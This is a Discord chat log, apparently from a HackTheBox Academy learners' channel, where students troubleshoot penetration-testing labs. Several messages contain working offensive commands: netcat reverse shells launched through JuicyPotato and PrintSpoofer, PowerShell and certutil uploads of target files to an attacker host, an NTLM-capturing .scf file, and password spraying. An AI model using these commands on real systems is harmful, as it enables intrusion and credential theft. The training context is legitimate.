the windows machines when rdping into them are very unstable

ive dc'd 30 times today alone

Thanks, I'm not the only one this happens to.

yeah the jitters on us 1 2 and 3 are all over ping times are anywhere from 100ms to 1800

yes I have the same thing, it's unusable

Have you found a way to solve it?

i swap between servers

I've tried and it doesn't solve the problem

US1 / Whatever windows box I currently am on - Though I find it to be certain boxes more so than others

us 1 and 2

us 1 rn

I will retry

ssh yeah see what the difference is for us 2 or 3

both are horrible

eu?

it's a little bit better, but as slow as ever

the real question is, what does htb do?

wot

idk what hero is on or saying exactly but damn my times are high.. tcp us 3

i like tcp for stability but im gonna switch to udp

How can i download katana for kali linux?please help me

hes saying the same you are

google.com

Im stuck.
msf return session exploit comple but no exploit created i only had to fill one option and it was the RHOST from what I understood trough the lecture... help pls.

unless you're using a bind shell, you also need to set the LHOST, make sure that's on the same subnet as the target

trying to upload a file using PS (target host) to py http server on my attack host, but this command isnt working.. method is unsupported.
"Invoke-RestMethod -Uri http://10.10.14.13:8000 -Method Post -InFile C:\Tools\20240325182442_ILFREIGHT.zip -UseDefaultCredentials"

im dumb.. removed "-method" and changed infile to outfile

I find an SMB share is a lot easier.

how do i go about that?

are you rdp'd into windows?

yes

this is the option from my understanding i only had to set RHOST.
also when i try to set LHOST to tun0 the msf fail completly

/drive:drive,/home/name/dir ?

in kali type 'smbserver.py -smb2support share .', and then in windows open explorer and type \\<your tun0 ip>\

Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through SPL searches against all data the port that one of the two C2 callback server IPs used to connect to one of the compromised machines. Enter it as your answer.

I need some help for that, what I have done filter the C2 IP, and Compromised Machine IP with some rulename, but none of the port is right

for whatever reason thats preventing me from rdp'ing to the target

your lhost is definitely wrong, also make sure you're using the right exploit

doesnt work, not even typing "python3 smbserver.py" because the file doesnt exist in /home/name/smbserver.py

i can locate the file but its in the impacket dir

locate -i smbserver.py

welp i guess it's impossible to use if it's in another directory

do i have to run it from that that dir?

you can run it from whatever dir you like

hmm.. tried this "python3 /usr/lib/python3/dist-packages/impacket/smbserver.py -smb2support share ." nothing happens after i hit enter and in the target host it cant connect to my attack host

i dont know what to say, works for me.

I use the default on pwnbox upon changing the Lhost to turn0 i get a "Handler failed to bind to 10.129.106.194:4444:- -"

When it come to the exploit im using the one provided in the lecture.

i also tried to change the lport to 445 only for it to fail

is 10.129.106.194 your tun0 ip? that looks like the target ip

yooooooo youre right omg feel so stupid right now

need more info than that to help, but smbserver does work. you could just upload to your python http.server with Invoke-WebRequest -Uri "http://10.10.16.2/upload" -Method POST -InFile "C:\path\to\file.txt"

thats how it be sometimes

looks like something was wrong with kali's impacket build.. I can run smbserver now

ill try this too, trying to retain all this info

certutil -urlcache -f "http://10.10.16.2/upload" "C:\path\to\file.txt"

Thank you

there are plenty of ways. smb server is nice because you can just use the gui to cut/paste

what conditions would prevent me from using smbserver? imagine if smb is blocked?

http is probably better, works across both windows and linux, easy to pivot with

no idea. i don't think sysadmins typically block connections to other computers over smb on networks. maybe they would though? would be weird to manage i think.

i struggle with remembering how to use PS to upload

oh there's also scp

would scp work on linux to win?

SCP relies on ssh, so you could if you installed ssh on windows, but you can scp from windows to linux

powershell has ssh built in, but windows isn't running ssh as a service typically

alright right now im rolling with HTTP method with PS. it looks like i grab the file with http.server on my attack host but i dont see it on the directory im in... where is the file going

10.129.230.228 - - [25/Mar/2024 19:20:40] "GET / HTTP/1.1" 200 -

Invoke-WebRequest -Uri http://10.10.14.13:8000 -OutFile C:\Tools\20240325182442_ILFREIGHT.zip -UseDefaultCredentials

https://github.com/juliourena/plaintext/blob/master/Powershell/PSUpload.ps1

nice, use that

that worked like a charm!

gonna have to make a ton of notes here, thanks fellas

Has anyone completed the Session Security: Skill assessment

Need some serious help in this..!

I found the admin cookie value but when using it to get to the admin session it gives error as minilab.htb.net?error=noauth, whereas in section Obtaining Session Identifiers without User Intersection section the same method is working

Months back one guy used the same cookie copy and pasting method and it worked
Now it's not. I am really having no idea

You can DM me

Thanks

Anybody available for a question on AD Enumeration and Attacks Skills Assessment 2? I'm trying to figure out if it's a technical problem with the lab or of I'm just not using the correct tool

What's the question?

I've got creds but can't seem to get any remote connection to work with xfreerdp etc

wmiexec or anything

Does evil-winrm works with that creds?

Nope

tried everything crackmapexec, evil-winrm, xfreerdp, ssh, reminna

do you get a little [+] showing the creds work with cme? rdp isn't always enabled, but i don't know about that specific box.

It feels odd forcing myself to take the rest of today off after this section I solved, lmao

Back to the grind tomorrow. How were the PrivEsc Modules? I'm looking forward to them 😄

Those creds should work somewhere, more than one box yeah?

I've tried the creds on all the IP addresses I have, thats why I'm wondering if I'm encountering a technical problem or just missing something

so no?

Didn't see your question. I get nothing returned when using crackmap exec, no errors or anything. The command executes and then nothing.

What question you in?

Skills Assessment 2, question 3

Sounds like you're not connected then

or hitting the wrong ip

i've only seen CME not return any results at all if the IP i'm targeting isn't up, wrong ip, or not connected to vpn

That's the weird thing, it does this with all the IPs that I have access to. I've pinged and tested they're all up

xfreerdp should work fine

xfreerdp doesn't connect

and what's the error

brings me to an Xorg sign in screen

so a linux box?

I'm trying to connect from the attack box

Can u show the screen/error you getting?

yeah xfree says the error every time

plus cme not showing results indicates network problem, be it not connected, wrong ip, something like that

Might be a wrong ip

If it was the wrong IP, why would it do it with all 3? That's what I"m wondering

because you have something wrong with the network stuff

you still haven't shown the ip's or errors

show the box's ip address, show the command

pretty simple

i can't think of any other reason cme would not show any data. if you hit a box it can't auth to, it tells you. if you auth to it, it tells you. if it shows nothing, you aren't targeting the right thing or simply can't find a route to that ip.

those are the only 3 things that happen when you use cme, so saying there is no output indicates a network problem of some kind

Can u show the command :3

Waiting for the session to spin up. I terminated and am restarting.

Not sure why it's taking so long to spawn a target

do you have a web proxy on? try refreshing the page

Nope. I'm wondering if it's a HTB network thing. I refreshed the page already

I can't get one to spawn either. Tried US servers and canada

This probably answers my questions. I know the IPs aren't wrong, I've used crackmap exec a thousand times and never got zero response from it before at all, or at least that I can recall

I'll take another shot at it tomorrow, and update ya'll then

Thanks @cloud urchin
Solved

some help me withe the best command to Configure the network settings for your LXC container on my PWbox .. I tried this command {sudo lxc-config -n linuxcontainer -s network} but came out with an error message.... URL : https://academy.hackthebox.com/module/18/section/2097

You better ask this question here in #homelab-sysadm It has nothing to do with the Academy
If you have no access, read and follow #welcome

https://academy.hackthebox.com/module/18/section/2097

Please what exactly are you talking about ..

guys pls help me

i am the guy from yesterday

i still cant get the open vpn working pls help

like i successfully connect to the vpn but i am not able to ping /scan the target machines apparently

can i get any help

you should contact support

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

thank you

guysi am not able to contact

pls help

im doing the Attacking SAM but I my answer is not being accepted for the SAM DB location which is C:\Windows\system32\config\SAM any ideas?

That’s not the location.

read the question very well.

NTLM Relay Attacks- Skill Assessment, Q3: Submit the password of the SQL user 'sqlftp'.

I have pawned BACKUP01, I can see txt file "sqlftp test.txt". I dump ldap info about Domain Users and I know about dod, mozah, sqladm etc. I changed the content of the sqlftp test.txt file to:
[Shell]
Command=2
IconFile=\172.16.119.20\tools\nc.ico
[Taskbar]

I don't get the ntlv2 hash from any new user. I have the password for sql_ftp_test but I can't log in anywhere. Please help !!!

check what you can access with the creds you have, maybe some shares

Solved ;D

I've been beating my head against the wall trying to figure out wtf is the problem here. What am I doing wrong?

that's not how you use it after you've imported it, read the section again

Some ideas for Windows Privilege Escalation -Further Credential Theft? I found the credentials for sa and tried everything in the module.

But no success and run out of ideas.

Solved. 🙂

hello anyone completed the introduction to c#

because i have problem with the section librairies im not able to import librairies

they exist? 😄

yeah

yesterday stopped at SHELLS & PAYLOADS /
Automating Payloads & Delivery with Metasploit
and today i read through the Infiltrating Windows module (havent yet started the questions).
so my question is why do those two modules want you to drop into system shell with "shell" command?
as far as i saw it you dont really have auto complete etc on the system shell, and on meterpreter it worked fine moving through the files/directories. like example:

so isnt it better to just stay at the meterpreter?

sometimes you'll need to use native windows commands, meterpreter won't have those

understandable thanks, is there a way to make them more functional the shells? with autocomplete etc? like example with nc you can just do python3 -c 'import pty; pty.spawn("/bin/bash")' etc?

to upgrade tty

not with msf afaik, you can send a revshell with that if you want

okey yea i meant with msf, okey ty for the help

Hi guys, I'm currently stuck on Suricata Rule Development Part 2 (Encrypted Traffic) | Working with IDS/IPS, on this question: "There is a file named trickbot.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to a certain variation of the Trickbot malware. Enter the precise string that should be specified in the content keyword of the rule with sid 100299 within the local.rules file so that an alert is triggered as your answer." Any help would be great 🙂

There will be times where you have to actually drop into the system. Msf is just a c2 that organizes your machines and holds pre and post exploits. When you have to do things like chisel or dump sams you’ll need to be in the shell

hey
guys i have question
can anyone help me ??

yea ic ic tyty. jeeez my stupid ass was typing cat C:\flag.txt instead of type on and was wondering why nothing came out. since shell didnt work for EB so i used the command one 💀 (edited: since like i had same issue as someone else that couldnt drop a shell on the target, even with parameters set correctly. lol)

in the network enumration with nmap and in the last section lab hard one lab can anyone help figure it out ?

one of the higher ports could be interesting. if you havent scanned it yet rescan for higher

pretty sure you can use cat in meterpreter.

ye i tryin useing nmap -p- but its taking to long for scanning for the hights port

you need to be evasive with this one.

review the firewall and ids section.

nah it wasnt a meterpreter shell. it was a straight command one
since the shell one didnt work
maybe i was blind and missed something lol

ye i use nmap -p- -Pn -D RND:5 <ip>

is that right for that ?

||dns||

If you are in msf you need to do c:\. It will only recognize that as the \ is used for other commands as well

what is that ?

Yeah if you are in a command shell then you need to run command shells you could ideally run the post shell-to-msf

Yea i did but cat didnt work, typed worked as shown in my ss above . Lesson learned

Because you weren’t in a meterpretee session. At that point run the post/shell_to_meterpreter module

that's the hint, go to the section I mentioned and read on the hint and try the commands there.

Which is weird tho because usually with exploits they go straight to meterprester sessions

can you give me the section name again ?

im doing the Attacking SAM and whem im doing the move sam.save \10.10.15.197\CompData im getting access denied

#modules message

tnx

Run it as admin

You should have read that bob is a local admin

im running cmd as admin

Hi guys I’ll need help with starting point, I’m stuck on Appointment in tier1 it’s about using gobuster, I found the wordlist location but there is not such a directory list-2.3-small.txt

Using parrot os

Idk. I mean from what ive seen psec and other should hsve worked but not sure why my shell didnt get back to me. Thats why i used the command one. Learned a new lesson

Did you@run it through meterpreter

verify your account in #welcome and head to #starting-point

Rhosts and lhosts were all set to the target / tun0

Interesting. I wonder if av was flagging it

I saw some other ppl were having the same issue.
#modules message

Not sure maybe i was stupid and copied something wrong but i doubt lol

hey

Maybe reseting would have helped

i try to do spoof ip address from the attack box but its not working

can show me some examples for the spoof source ip address ?

hey cant figure it out can you help me

i do everything but i find the highest port 49154 but i dont know what to do

i try --source-port for scanning from this port but nothing showed up

maybe thats not the port you are looking for

can give me the nmap command ??

im stuck

run an nmap full tcp scan with that flag.

Hi guys can anyone please help me with that task? Idk the location of the file called small.txt for go buster. I’m using parrot os. I have checked the se lists are in /usr/share/wordlists/seclists but I can’t find that specific file

i run nmap -sT <ip>

is that right ??

that's not a full port scan., -p- is.

okey i will run that see whats happen

.

its take 54 minutes do you think its okay ??

it takes a while.

so what can i do ??

you wait xd.

just make sure you have all the necessary flags.

i take the -T to 5

is it okey ??

Type:
locate directory-list-2.3-small.txt
And see if there is a hit

No, when you increase the speed you may miss some ports.

okey

btw, what's the command you are using?

sudo namp -p- -sT <ip> -Pn -n --disable-arp-ping -v -D RND:5

Doesnt it block without Source port?

@fringe urchin it’s says locate command not found

something like this
||sudo nmap <IP> -p- --source-port 53 -v||

should provide the relevant section and hints on the flag to get the answer, just straight up providing commands doesn't help anyone imo

can you send me the command in DM ??

it show black screen

I have bro.

lmaoo

okey i got taht

Ok before you install it. You just searched for small.txt? Since i think none of those.files is called small.txt

lol just gonna delete that in case someone tries it

My computer shut off

read the section and understand what the flags are for, don't expect answers to be provided, it's a skills assessment

That’s what is says in the task, to locate the wordlists and then that file I attached the photo

There is probably one directory between the file and seclist

no crash you try

But just install locate

find / -type f -name 'directory-list-2.3-small.txt' 2>/dev/null`

also this is for #starting-point

That’s what I’m looking for

Put this guy thru the intro to Linux section

Holeeeeeey

Locate handy tool
After:
Sudo updatedb
Locate the name of the text file

#starting-point <---

https://academy.hackthebox.com/module/67/section/637
Windows Privilege Escalation Skills Assessment - Part I

I got a reverse shell already now im trying to escalate my privelege to admin or nt authority so im used juicypotato and printspooler but i failed to get a connection to my netcat listener on local host.
this error appear everytime i run printspoofer.exe

PS C:\Users\Public\Downloads> .\PrintSpoofer64.exe -c "c:\tools\nc.exe 10.10.14.157 8443 -e cmd"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[-] Operation failed or timed out.

juicypotato should work, did you look at the options?

I NEED HELP

HELP IS WHAT I NEED

IM IN FFUF MODULE AND CAN'T FIND EXTENSIONS

Call 911

im running cmd as admin can someone give me a hint?

are you trying to transfer the save?

yo so basically in the ffuf module assessment im running this command to try to fuzz for extensions:
$ ffuf -w ./extensions.txt -u http://archive.academy.htb:47671/indexFUZZ
the extensions.txt file is from:
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-extensions-big.txt
am i doing something wrong here?

i only get .php

yes

i cannot move all of the files

did you set up the smb share?

am i missing somethign important you can also see my command below if you could give me a nudge what to do next it would be amazing

this is what i used sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/

you run the extension fuzzing on all the found sub-domains

im not stupid ok?

anyway i tried it again and it worked for some reason idk

what??

what?

Did you change the default directory? The default directory in the example of LT Bob, and unless your system is named LT Bob is not going to connect to share.

done, thank you for the help

With the examples, they’re just there to show you how it’s done. You need to cater the example to your own system and make adjustments accordingly. Or else you’ll never be able to connect.

Is there any option to make the machine from Citrix Breakout to run better?

for page 1 windows event logs and finding evil the question are not right the 2nd question i cannot complete

anyone can help me with weak permissions in the windows privilege escalation module?

why does npm init -y not work?

Did you solve it?

are connections to hosts extremely slow in eu-1/2?

hi, EU vpn problems ?

why no results

This isn't the place for that, you already posted in #boxes , what for an answer there

I don't understand where I have to put the vuln parameter for the second task in this module :
https://academy.hackthebox.com/module/58/section/517

|| I know the id=1 is in the cookie but I don't understand where I can put it in the command with sqlmapI mean, I tried with "cookie", "data" and nothing 😦 ||.

What are you asking specifically?

oh i see your spoiler one sec

it's in the module there, under custom sqlmap requests

I tried these cmds :

• ||sqlmap -r request2 --data="id=1"||
• ||sqlmap -r request2 --cookie="id=1"||
• ||sqlmap -r request2 --cookie="id=1*"||
• ||sqlmap -r request2 --cookie="id=1*" --method GET||
• ||sqlmap -r request2 --cookie="id=1*" --method GET --data='id=1'||

or, you can copy it into the curl command

I did it as well.

DM me the curl command you put into sqlmap

I have the full request...

As a file.

k well dm me the command you used

^

ok, and what was the result

did you get an error or did the command go through successfully

Errors, similar to this.

Speaking about crawl but I tried with and nothing...

i'm going to need to see the full command like i said.

It's the full commands...

Just using a file, samething.

But if you want :

ok dm me a screenshot of the command if you want my help

if your commands you put in here don't work then you messed something up getting the request

i was able to use the curl method

||curl 'http://94.237.57.59:45757/case3.php' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8' -H 'Accept-Language: fr' -H 'Cache-Control: max-age=0' -H 'Cookie: id=1' -H 'Proxy-Connection: keep-alive' -H 'Sec-GPC: 1' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36'
--insecure ||

your command is missing some flags

???

you're not specifying the cookie

Yeah I know but I tough you were speaking about the curl xd.

in your sqlmap screen shot

I fixed dw.

Just wanted to see, but why it was not working??

did that work for you?

i'm not sure why, i think you copied the request wrong or something

Yeah.

works fine with copying via curl

I was in brup suite > copy as file > save to file > named request2

idk i'd have to see a screenshot of the command

you didn't specificy the cookie in that last one even though you said you did in the commands

or it could be your process of getting the request i really don't know

i would have to see exactly what you're doing for that

The first, I force cancelling to try with the request file.

Then the second is with the file.

not sure, don't know sqlmap well enough for that. were you able to do it with the copy to curl method?

Hello Help me I use procdump I have a lsass.dmp and a I use mimikatz I have this plz help me ^^"

CWEE ---> JWT tokens section "Attacking Authentication" I've run the jwtcrack tool and I'm getting no response, it finishes but htere is no output

feel like im just really misunderstanding some really simple shit so a nice smack on the head would be nice 🙂

https://tenor.com/view/facepalm-really-stressed-mad-angry-gif-16109475

nvm i see they give you a JWT ><

help

Yeah yeah just "copy as curl" but with the file it's easier and easier to read the cmd.

Hello, I have a question regarding AD.
Is the krbtgt msds-supportedencryptiontypes attribute used to select the TGT encryption type?

About SQLMap, does there is a risk if we use level 5 or no?

Hi guys, I'm doing the Linux Privilege Escalation Module - LXD. And I have gained root through the container and am looking for the flag.txt file, currently running grep again at the moment. Is there something I am missing? running grep -r -l 'HTB{' /, but idk why when I grep for flag.txt it says it doesn't exist so not trying to waste anymore time searching if I may not be understanding what I should be doing lol

Well the flag might not have the HTB{} and usually the root flag is in the root directory /root

Also did you try to find flag.txt

~ # cd /root
~ # ls -l
total 0

ain't /root the home folder for root

yes

Wtf ^^" ?

You say "grep" but you don't "grep" a filesystem for a filename, you use locate/find

tried both of those

Is the file executable?

shit i must be thinking crooked

yes ^^"

Then you might not need the ./

Especially since you're in the file location

ah yes thanks

im using bin/sh, won't let me use locate

Find is still a command

Also it could be in a hidden directory

So ls -l doesn't show everything

ls -a does

I found it, modified my find command. Thanks, just wanted to make sure I wasn't in the wrong place for some reason or using the wrong shell or whatever lol

can any one help me

No, you're alone, no one can help you

It's always best to at least say what you need help with

https://tenor.com/view/i-cant-help-you-nope-no-way-i-cant-keanu-reeves-gif-13730615

any haceker can avilablie

https://tenor.com/view/bane-no-banned-and-you-are-explode-gif-16047504

Hi guys, i've been struggling for more than a reasonable amount of time on AD Enumeration & Attacks / Skills Assessment Part I regarding the retrieval of a cleartext password. Would anyone please be able to help ? 🙏

If its something illegal no can do #rules rule 4

its legal my account was hack

and my server also

🥺

Then contact discord support

Nothing we can do for you my dude

im send 100+mail

If you got hacked there's a nonzero chance you downloaded and ran something you weren't supposed to

Just an example:
You acc got hacked since you probably dowloaded somethinf and there was a discord tokem stealer in boom your acc gone. We cant.magicly just hack your account lol

idk

Well then you just gotta wait and be patient, sending more emails doesn't make them respond faster

In fact, as someone that's worked IT, it's just annoying

It's a process: support gets your message -> an agent/team gets assigned to investigate -> they reach out to provide more info to ensure you are the owner of the account

this is my alt acc

Ok, we do not care

We literally can do nothing for you to get your account back

why

Uninstall anything you may have installed recently

Because

1. it's illegal
2. it's illegal

ahh ok

ah but what is this server do

Reading the #welcome channel can help you find that out

If you can't be bothered to read: leave

can i learn this

But this boils down to: you downloaded something, likely a "cracked" software that ran a token stealer

Which bypasses any login stuff

Meaning even if you had 2fa, it doesn't matter

Not in a day

noproblem

i need to larn hacking

And if you wanna hack discord, be prepared for the police to knock at your door

It wont teach yiu how to hack someinw discord tho

Nope

lol

There's no course within HTB that will teach you how to specifically hack discord

Or any other social media

Because, to circle back, that's illegal

anyone ? 😦

ok den byee

everyone

👋

You need to do some cracking

Its not gonna be a directly plaintext password

according to what can be found on htb forum it should be readable directly in plaintext using the right options in mimikatz. I think i tried them all without success. I finally (like 2mins ago) was able to see the cleartext password in a weird kinda memory dump in Lazagne output but I would love to know how to get it via mimikatz

I think I did lsadump with mimikatz ¯_(ツ)_/¯

yep i tried is a well, but nothing at all regarding the targeted user..

plenty of ways but I don't recall it being in plaintext ¯_(ツ)_/¯

I remember needing to do some cracking however

I just found the right command, its in cleartext indeed 🙂

thx !

Anyone regarding my question please?

Seems like it, you can likely Google it though

Your question got drowned out as it didn't seem related to a module, and other people were getting assisted

https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/decrypting-the-selection-of-supported-kerberos-encryption-types/ba-p/1628797

TGT encryption type – As mentioned before, a TGT is only read by domain controllers in the issuing domain. As a result, the encryption type of the TGT only needs to be supported by the domain controllers. Once your domain functional level (DFL) is 2008 or higher, you KRBTGT account will always default to AES encryption. For all other account types (user and computer) the selected encryption type is determined by the msDS-SupportedEncryptionTypes attribute on the account. You can modify the attribute directly or you can enable AES using the checkboxes in the Account tab.

@next bronze I read it but I didn't not understand it because at point it says the user account attribute is used and another point it refers to the Krbtgt account

The msDS-SupportedEncryptionTypes attribute uses a single HEX value to define which encryption types are supported.

this means is containes a value that tells you what is supported, not what is selected

I understand that for TGS the user account is used but I'm not sure for the TGT

@cloud urchin yes, that I know but my question is related specifically to the encrytion algorithm for the TGT

your question was that attribute dictating the encryption type

the answer is no, it tells you what's supported

you literally said it right here

"Is the krbtgt msds-supportedencryptiontypes attribute used to select the TGT encryption type?" the answer is no.

But in the same document it says that if I want to restrict what encryption algorithms aee supported I change the attribute of the krbtgt account and then restart the controller

yeah and?

and that's not contradictory

Yeah thats not a contradiction

Its literally a switch that says "support these encryption types"

The encryption selected is based on several factors, it's a result of the negotiation process between the client and the KDC, considering their capabilities, the ticket policy settings, and other config settings... it picks the strongest one between them all

look at it this way, your car has 4 seats and can support 4 people. does that mean your car dictates how many people are going to be in it?

no it just means that's how many people you can fit in there

So the supported encryption types is based on the krbtgt attributes and the user account attribute?

No..

supported encryption type simply means it can use those particular encryptions

^

If I want to know what encryption types are supported for a user account for the TGT, what attribute is relevant?

My english is not good sorry

supportedEncryptionTypes...

Ok, of the user's account or of the krbtgt account?

https://tenor.com/view/frodo-sam-samwise-gamgee-lord-of-the-rings-circles-gif-17520001

Of the tgt account

Tgt says: this is what I support

And user says "OK, I'll encrypt the strongest of these options"

@fathom pendant, ok, that's what I understood, that for the TGT it's based on the krbtgt account and for the TGS it's based on the user's account properties.
Is that correct?

no

you need to understand the supportedEncryptionTypes attribute is associated with the KDC, the key distribution center. the KDC is responsible for issuing BOTH the TGS and TGT tickets for services.

you should take the kerberos course you'd love it lol

Yes, for the TGS the encryption key is based on the user's password and the available encryption type for the TGS is based on the account properties or the default properties set on the domain controller.

nah

its how i said earlier

The KDC dictates what can/can't be used in encryption, and sets those rules for the TGT/TGS

if it was based on the user's choice that'd be a huge security problem

KDC sets the value which gets passed to their respective parts

@cloud urchin I didn't say it was based on the user's choice but for the TGS the supported encryption types are set on the user's account stored on the domain controller.
I'm setting an environment now to do some tests

@fathom pendant the KDC select from the list of supported algorithms provided by the client.

I thought the article is pretty clear

@next bronze probably but my english is weak, so most partq were clear, the part about the TGT wasn't.
Sorry for the disturbance

Were you able to get this resolved? I'm having the same issues.

Not sure why neither of these result in a reverse shell 😦

||

PS C:\tmp> .\JuicyPotato.exe -l 1337 -c "{90F18417-F0F1-484E-9D3C-59DCEEE5DBD8}" -p C:\windows\system32\cmd.exe -a "/c c:\ProgramData\nc.exe <IP> <PORT> -e cmd.exe" -t * 
Testing {90F18417-F0F1-484E-9D3C-59DCEEE5DBD8} 1337
......
[+] authresult 0
{90F18417-F0F1-484E-9D3C-59DCEEE5DBD8};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

||
||

PS C:\tmp> ./PrintSpooler.exe -c "c:\tmp\nc.exe <IP> <PORT> -e cmd"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[-] Operation failed or timed out.

||

Update: ||Kept trying lots of different CLSIDs from the list and eventually one worked, though there was no difference in the output of running the command 🤷 ||

Yeah try playing with clsid read the github repo of juicy potato

Oh really? That's the response for an incorrect CLSID? I was getting errors before 🤔

Sent you a dm saw your command there is lot of issue

ICMP Tunneling with SOCKS
Several issues with this module: -- I will name the most prevelant --

1. Issues with the vm fully loading
2. ssh keeps kicking me out
3. Issues getting the ptunnel-ng running properly from my own vm - THe issue of missing a module so the ptunnel won't run unless I compile if from the HTB vm. FOund this out during research
4. Used the HTB vm and I keep getting kicked out of the ssh session. My commands are correct.
5. Does anyone have a workaround suggestion for this porblem?

GOt it working for a sec and then it dropped the rgp window again - this is after a few resets - not stable

Could I get some help with "Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer."

https://academy.hackthebox.com/module/147/section/1322

I have the password for Kira, but I cant use it to log into anything but smb with an empty share

Currently im trying to crack SSH with a mutated password list of Kiras password, but this seems like a too roundabout (and lengthy) way of doing things

So im probably not approaching it right

DM me or TAG me here please!

@fathom prairie Check one of the mutated lists you created from a previous module 🙂

I deleted all of them because I thought I wouldnt need it anymore

which one are you talking abnout?

A good place to start would be to check the module regarding "Password mutations"

I'm doing the Footprinting module (Section: FTP). I'm stuck on the second question. Could someone provide a hint/advice?
Enumerate the FTP server and find the flag.txt file. Submit the contents of it as the answer. I don't have the password or creds to login to ftp..

Sometimes poor configurations allow for guests to connect without credentials.

I tried with anonymous without password, but they asked for root

If it's asking for root's password, that means you're logging in as root

Okay Ive remade the mutated passwod list

But what do I do with this?

I thought Kiras password was asssumed to be some variation of Loveyou1

I would review the section in the module about downloading all available files

hmm, curious, the anonymous login doesn't work for login but works for file dl..

Try ftp anonymous@ip

That pw variation is in the large mutated list, she does reuse her password across many services

omg finally got that CORS misconfiguration question

Was it something goofy?

the linux ptt section makes my head hurt

It's fun

Nah just a little tricky because one part wasn't explained about writing the exploit

Just... using tools makes it faster to find

Ahhh

So lots of digging and throwing shit at it

yeah i could not figure out why my code didn't work.. i took a closer look and figured it out though. ofc. lol.

that's how they get you here

https://tenor.com/view/spelling-mistake-minor-spelling-mistake-meme-gif-23650588

there so much info

just reading it my head isliek huh

So the password im supposed to use to log into Kira is in the large mutated list?
Also, then do I try to use that to crack FTP and then reuse that password for SSH to continue with this lesson?

then it goes into port forwarding

the hint says what shes used as a password. why dont you try to use that somehow

I think we are confused...

no i did that section

I already did the mutated password lesson, and I already found out her password using a mutated version of that hint

okay

Im talking about this one " Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer.
"

oh

The password I found during the mutated password lesson doesnt work for this part

Indeed

youll have to find a different one then

So Im like... How do I do this

look for hashes somewhere

That password for that section specifically is for a different user

Oh so its for a different Kira?

Ill try that

I believe you also find her password for the credential hunting in linux section to get to will

Kira", who in most cases had SSH access to other systems with the password "LoveYou1

This part?

im so lost my guy

Yes, the password you used to log in there is the one you use

I found the right password for that using SMB crackmapexec, but it doesnt work here

Take this as a lesson to always save creds you find

Unless the SMB one is the wrong one and its different

To be clear Im supposed to use SSH to log in right?

What is the error you get with ssh

Is it wrong password or blah blah blah (publickey)

Permission denied

Then the password youvhave for her is wrong

Her password is a variation of LoveYou1

The password I have for her I got from the section with Credential Hunting

I got it off SMB

I have a variation of LoveYou1

why is the pw not working

Ill send it as a spoiler then delete it so LMK when you check it

WHAT THE FUCK

THATS HIS ACTUAL USERNAME?

did you crack the id_rsa?

WHO DOES THAT

wrong person sorry

why you trying to ssh without id_rsa?

ur good

but that USERNAME

I assumed that whats it meant by log into the host

Delete that byw

the pw you found should be a passphrase to enter when using the cracked id_rsa not the kira pw

👍

What's the command you're using?

Gimme a sec though while I sanity check

i fugured it out

kk

his username is actually david@inlanefreight

so its ssh david@inlane@ip -p

Huh... Then how do I log into the host

he wanted to be funny

ssh {username}@{IP} -i id_rsa ?

Because it's a domain joined linux host

imma just start taking htb literal on everything they say

They don't have the rsa key

OHHHHHHHHHHHHH

Ya dingbat they're trying to log in to grab it

But I dont have the id_rsa

i knew that

It says log into the host and then crack the ID_rsa

^

My head is spinning Im gonna faint

You should be able to log into ftp

my bad didn't read the question well

Note things may appear hidden at first

Ok give me one second, maybe the SMB crackmap is a false positive

I mean her password for logging in is the same from the earlier section

The problem is that I took a week break

So I forgot all the passwords and I didnt save them ;~;

Well: this is why you save creds

Take it as a harsh lesson

Yes.. A very time consuming lesson

but you won't make the mistake again ¯_(ツ)_/¯

Sadness

Can crackmapexec not read .list files?

It can

Then uh... Whats this about

Dude

Lowercase k btw

It's reading a list fine?

It's showing the not-positive results

oops

All the results arent positive

But whats with the NonType object

Don't worry about that

Point is: it didn't log in

So FTP is a no go?

It can be a go

Literally all It's telling you is it didn't auth with those creds, so that combo isn't good

Those aren't errors

Wasnt the password a mutation of LoveYou1 though

Yes

The list I put it in a mutation of LoveYou1 using the custom rule they gave

You're attacking a linux device: casing is important

Same result for Kira and kira

Weird

Lord save me

So uhmmm anymore ideas

Before I tear out my hair

can u tell me where did you find the kira password? in what section exactly so i can try to re do the question

I dont remember where I found it, thats the main problem

I did some sections about a week ago and then took a break

and then I came back to see it asking to use the credentials

but I forgot them

The og password was found in the credential hunting linux section

But it was never the answer to a question

You can also use hydra

What was the syntax for that?

-t 48 is the most stable

-t -l -P ftp://aip

or something like that?

hydra -l username -P list service://ip -t <threads>

🙏

Btw each module has a cheat sheet you can reference for command syntax

Right forgot about that

Hydra got me a different password than crackmap

Oh lord thank you

I can finally continue my journey after ten long years

👍

If one tool doesn't work: try another

Does crackmap have a problem with or something

No

It was the same password as crackmap except they were missing that at the end

It's likely after a bit that the ftp server was just overloaded

oh

So it just auto-rejected everything thrown at it, correct or not

Good to know

Thank you 🙏

Also it looks like smb is a "trap" as it accepts any username/password combo so it'll just spit out a positive no matter what

Having some difficulties with this one. I've already examined the local.rules file, reviewed its content, and explored Wireshark. However, I'm still struggling to pinpoint the XX Byte Value I'm supposed to be looking for... Not sure where to go from here

Working with IDS/IPS > Skills Assessment - Snort

There is a file named wannamine.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to the Overpass-the-hash technique which involves Kerberos encryption type downgrading. Replace XX with the appropriate value in the last content keyword of the rule with sid XXXXXXX within the local.rules file so that an alert is triggered as your answer.

am i supposed to read this via comman or with the output stay the same if i download

i connected with smbclient \\DC01\julio\ -k and the flag isnt taking

i used the get command tho

if you do dir is the flag in that directory?

oh my fucking got

"flag isn't taking" also isn't descriptive

are you in a directory you can write to?

